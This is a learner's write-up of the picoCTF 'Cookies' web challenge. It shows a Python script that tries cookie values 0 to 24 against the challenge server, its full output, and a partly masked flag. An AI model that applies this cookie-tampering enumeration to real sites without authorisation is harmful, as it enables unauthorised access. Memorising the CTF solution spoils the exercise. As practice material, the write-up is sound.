Cookies

Description

Who doesn’t love cookies? Try to figure out the best one. http://mercury.picoctf.net:29649/

---

Steps :

on that webpage i tried the random names and test what is the response, didnt get something interesting instead i typed the snickerdoodle which is suggested word on the input. so after it search it i got a response. then i went back to home page which is http://mercury.picoctf.net:29649 but there is no homepage im still on the http://mercury.picoctf.net:29649/check

every time i reloads im redirect to /check, so thats kinda sus and i clicked /home. it redirect me to home again. i inspected chrome dev tools > inspect > application > cookies and saw something interesting. its -1 when im on home and even when i submit invalid cookie name, after i search for the snickerdoodle it changes to one. so i changed the cookie value to 2 and refreshed the page, after that i got **I love oatmeal raisin cookies!**

so its basically changing the content with the cookie value. so lets brute-force the cookie value, i created this code (using CHATGPT) to brute-force this :

#!/bin/python3
import requests
 
# Loop through values from 0 to 24
for i in range(25):
    # Create the cookie value
    cookie = f'name={i}'
    headers = {'Cookie': cookie}
 
    print(f"[*] Trying cookie value: {cookie}")  # Show current cookie being tested
 
    # Send GET request with the current cookie
    r = requests.get('http://mercury.picoctf.net:<port>/check', headers=headers)
 
    print(f"[*] Status Code: {r.status_code}")  # Show response status code
    print(f"[*] Response Length: {len(r.text)} characters")  # Show response size
 
    # Check if the response contains "picoCTF" (meaning we found the flag)
    if (r.status_code == 200) and ('picoCTF' in r.text):
        print("\n[🎉] Flag Found! Response:")
        print(r.text)  # Print the full response
        break  # Stop looping once flag is found
 
    print("-" * 50)  # Separator for readability

result :

└─$ python script.py
[*] Trying cookie value: name=0
[*] Status Code: 200
[*] Response Length: 1779 characters
--------------------------------------------------
[*] Trying cookie value: name=1
[*] Status Code: 200
[*] Response Length: 1780 characters
--------------------------------------------------
[*] Trying cookie value: name=2
[*] Status Code: 200
[*] Response Length: 1780 characters
--------------------------------------------------
[*] Trying cookie value: name=3
[*] Status Code: 200
[*] Response Length: 1776 characters
--------------------------------------------------
[*] Trying cookie value: name=4
[*] Status Code: 200
[*] Response Length: 1776 characters
--------------------------------------------------
[*] Trying cookie value: name=5
[*] Status Code: 200
[*] Response Length: 1779 characters
--------------------------------------------------
[*] Trying cookie value: name=6
[*] Status Code: 200
[*] Response Length: 1777 characters
--------------------------------------------------
[*] Trying cookie value: name=7
[*] Status Code: 200
[*] Response Length: 1771 characters
--------------------------------------------------
[*] Trying cookie value: name=8
[*] Status Code: 200
[*] Response Length: 1774 characters
--------------------------------------------------
[*] Trying cookie value: name=9
[*] Status Code: 200
[*] Response Length: 1770 characters
--------------------------------------------------
[*] Trying cookie value: name=10
[*] Status Code: 200
[*] Response Length: 1774 characters
--------------------------------------------------
[*] Trying cookie value: name=11
[*] Status Code: 200
[*] Response Length: 1772 characters
--------------------------------------------------
[*] Trying cookie value: name=12
[*] Status Code: 200
[*] Response Length: 1772 characters
--------------------------------------------------
[*] Trying cookie value: name=13
[*] Status Code: 200
[*] Response Length: 1774 characters
--------------------------------------------------
[*] Trying cookie value: name=14
[*] Status Code: 200
[*] Response Length: 1770 characters
--------------------------------------------------
[*] Trying cookie value: name=15
[*] Status Code: 200
[*] Response Length: 1776 characters
--------------------------------------------------
[*] Trying cookie value: name=16
[*] Status Code: 200
[*] Response Length: 1774 characters
--------------------------------------------------
[*] Trying cookie value: name=17
[*] Status Code: 200
[*] Response Length: 1771 characters
--------------------------------------------------
[*] Trying cookie value: name=18
[*] Status Code: 200
[*] Response Length: 1184 characters
 
[🎉] Flag Found! Response:
<!DOCTYPE html>
<html lang="en">
 
<head>
    <title>Cookies</title>
 
 
    <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css" rel="stylesheet">
 
    <link href="https://getbootstrap.com/docs/3.3/examples/jumbotron-narrow/jumbotron-narrow.css" rel="stylesheet">
 
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
 
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
 
</head>
 
<body>
 
    <div class="container">
        <div class="header">
            <nav>
                <ul class="nav nav-pills pull-right">
                    <li role="presentation"><a href="/reset" class="btn btn-link pull-right">Home</a>
                    </li>
                </ul>
            </nav>
            <h3 class="text-muted">Cookies</h3>
        </div>
 
        <div class="jumbotron">
            <p class="lead"></p>
            <p style="text-align:center; font-size:30px;"><b>Flag</b>: <code>picoCTF{3v3ry1_l0v3s_c00k135_********}</code></p>
        </div>
 
 
        <footer class="footer">
            <p>&copy; PicoCTF</p>
        </footer>
 
    </div>
</body>
 
</html>